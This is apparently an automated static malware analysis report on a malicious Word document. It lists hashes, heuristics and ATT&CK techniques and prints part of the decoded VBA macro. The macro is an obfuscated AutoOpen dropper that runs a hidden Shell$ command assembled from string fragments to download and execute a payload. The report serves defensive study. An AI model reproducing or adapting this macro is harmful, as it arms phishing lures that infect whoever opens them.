Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e706b3a32f4c177f…

MALICIOUS

Office (OLE)

173.0 KB Created: 2017-12-14 12:11:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: eaef4b19068aee4c6b1b17d96ddffc44 SHA-1: 8fb66dde86a0dd52343a720e1f8209cf6de98c53 SHA-256: e706b3a32f4c177f1a3536dbd480c639666381b8a68b59821488116c51374eee
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

This document contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and configured to execute code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, likely involving image manipulation or delivery. The VBA script uses string concatenation to build variables, but the critical `VBA.Shell$(NWIwSpjw, 0)` call is present, which is used to execute commands.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73517 bytes
SHA-256: 0a2287173c2b42bb56570a580d02a40b5066bf5097471e9f9502b45f039b6872
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oahmhvzwz"
Sub AutoOpen()
faWMndOTVtisw = "LQfFtnzwmkS" + "wXTPjhRYjYI" + "bOVrzJkBcd" + "ASrIBsjnm" + "KfqAGKAbazmHJi" + "SFAczRAUHTw" + "YQfzlWaQiirrz" + "ZCfdsIMdimfL" + "dKKijJScLuzA" + "jNwnOJcQrwod" + "oivhtTZjzGY" + "KhhHOHicGZwhuY"
iWlLWEFUnh = "BdbBlHYrDcv" + "dqGAUPjN" + "VwrNMuCrFMta" + "GEBEnrJCUtnN" + "VPElFHTr" + "fjoZMWAwPBi" + "kCwPboEjAEEAD" + "mnTHmHsZYS" + "OfmCWilfO" + "NFWiTOIjbfnV" + "jNiHPbBKijwM" + "ShdZSVoo"
hzcTsktwmc = "sDosWWDNaiYXS" + "waCCMSjw" + "fhfwiQQh" + "VTQOtlCwRbOqJZ" + "IwJqtZKM" + "sIKrZVzJBiBwuh" + "RzQBFkTWHUnl" + "ZnTLGVWk" + "KWviEpiXLOP" + "ZuJJHKYlCWm" + "pjNKqsYLzrpt" + "bfirkJY"
fAtKCwLzwX = "kMoUcUjSqDiiE" + "DjiutSNNM" + "jTAouNOw" + "BItnKCXDqi" + "ASotwSjCF" + "aWzdlIT" + "YdpjODIKtTrVP" + "ftKQiGpcjL" + "ObluJZtEKREdT" + "lloYMLj" + "CrFSViMDwwinA" + "WQjuwREFaPq"
VBA.Shell$ NWIwSpjw, 0
tVBDTAJY = "uoqEPrHVIz" + "DJOYpSNRlwR" + "cIlrCsdidbDcb" + "qiawjSPKJkGcO" + "msnbcwO" + "iAFdfVCcFmwzbi" + "oMzaRzBkZibrl" + "bzdduEZrGntIj" + "TfRaIBzOdXz" + "cPjwDiQodnTTja" + "zGMjJSWQt" + "BikoNVFjw"
JLHjPrsBjMz = "ijBIRrniGzmlCv" + "zQRNmiwHmwc" + "RZVjhPHAB" + "EEOsTVKYWjTL" + "kPzKKjbPKoZWE" + "PFVvvfMMMwuO" + "zNbwwGhkUiE" + "QZXtPoWPjuTAkX" + "fYCAQwGiCir" + "QWBvXQwfFpS" + "JXztCuaMaaBLRh" + "AJvVLXNFsizwk"
saqGFqszMbII = "BqVpipcwVKU" + "ZwSGKCzq" + "izKEMrvDzTN" + "rLPXtVG" + "mXPWzfta" + "BYKRFTqKlSwhv" + "rGDilCjRhq" + "nLkoEjzUMvuC" + "msZMIDIarzYP" + "zIYGjrTiSIFWjl" + "MjczDSv" + "dXJihIwLMYJjp"
End Sub
Function NWIwSpjw()
BGUXuc = IsNull("wIHAjlOTX") + IsNull("siWCZHFQcilLYk") + IsNull("rrDAwDimn") + IsNull("NbTtLQawUqSU") + IsNull("zimVwYhkjWlrtL") + IsNull("atOwiVLfm") + IsNull("RRLMEuzWwD")
KvljjDIz = IsNull("HWKkuWV") + IsNull("hFjdTdU") + IsNull("QjAUzdzbQRaq") + IsNull("Lnzccfvr") + IsNull("tZNihqTQip") + IsNull("qoqFtGdWjTc") + IsNull("ftWSiAqzYqrmbH")
JZQClHKSOc = Mid("4HMu7wAH8j4qKsTKYGrdesqKn+'+'qKtfw+tfwnigqKn+qKnnqKn+qKn.cotf'+'w+tfwmqKn+qKtfw+tfwn/qKn+qKn0mqKn+qKnRP/ycWqKn+qKn.qKn+qKnSpqKn+qKnliqKn'+'+qKntfw+tfwBtcqsGz", 19, 132)
XUGzGoYp = IsNull("KhfNGwdFi") + IsNull("RFGYabV") + IsNull("ZnCzwjHVYfcn") + IsNull("zHBQMiicZi") + IsNull("EVALEodTbkW") + IsNull("PKjzGkXzc") + IsNull("jTwFHOsnKAFbvd")
WWfpB = IsNull("dHYpLcSUd") + IsNull("jIkJkpa") + IsNull("JOttvjhwJt") + IsNull("bmYJSvCf") + IsNull("mPEvnVifuTJzf") + IsNull("VPXjMoIM") + IsNull("YIBPLzSNh")
fpmBARW = IsNull("vQkCJMkarlG") + IsNull("jcrBkwJpjNz") + IsNull("PaoaWKoOGTLT") + IsNull("vThvtHUBlJKSw") + IsNull("dlnzhRDnjY") + IsNull("DjzrWQRX") + IsNull("oicunGffd")
hSAzzDZrqfF = Mid("48aaCqdi0CqqjjBwKn+qKtfw+tfw'+'nSLkqKn'+'+qKnarapatfw+tf'+'ws +qKn+qKtfw+tfwn ycWqKn+qKn.exeycW;qKn+qKnforeachqKn+qndYzjm", 16, 100)
BFCrwPZK = IsNull("jkuKzFZF") + IsNull("EqkOwiC") + IsNull("uMqqjZwfnmGSjb") + IsNull("bnvYaEZ") + IsNull("mjGIcotFkIF") + IsNull("BrTzKwiJTT") + IsNull("UclIaAGcpUiD")
vbFkJNi = IsNull("AljAzuEB") + IsNull("GAcpKHwhWvc") + IsNull("fYBcEBOpwiTDNc") + IsNull("wLDqrGs") + IsNull("zJKNNWKkN") + IsNull("OUNfXttqMhc") + IsNull("ZchCBWSElrmK")
zbPCQwh = IsNull("cRUqthVK") + IsNull("EEkUvNcaQKT") + IsNull("lfrfTEijPCSoMX") + IsNull("inQmwctYhYGEs") + IsNull("PEYjKqmdKacqdL") + IsNull("lvIYUwm") + IsNull("XVUsHJH")
wjpsVnCwGJ = Mid("WdvumpZYUhKn+tfw+tfwqKnvqKn+qKnoktfw+tfwetfw+tfw-qKn+qKnIqKn+tfw+tfwqKntem(0SLhuqKn+qKnaqKn'+'+qKnsqKtfw+tfwn+qKn);brqKn+YzY", 11, 111)
wsvjClFItj = IsNull("TunASnu") + IsNull("ZzHrQnK") + IsNull("BuLlQkifLVoSIs") + IsNull("hCcEzFptuh") + IsNull("zcaKkiIHkzb") + IsNull("niMHpzwbwj") + IsNull("aoojLsLAQDo")
iJjPSRL = IsNull("mYUNspXqjBwKYm") + IsNull("HpcaCIp") + IsNull("wzVTJXXJaTrUo") + IsNull("UiFlzrfzB") + IsNull("QidETFJo") + IsNull("jWOXWNTIsWrhSR") + IsNull("UuURJzMzzLDbu")
aZCdobN = IsNull("FFAkGJBIYFdp") + IsNull("nzAwvFfTAz") + 
... (truncated)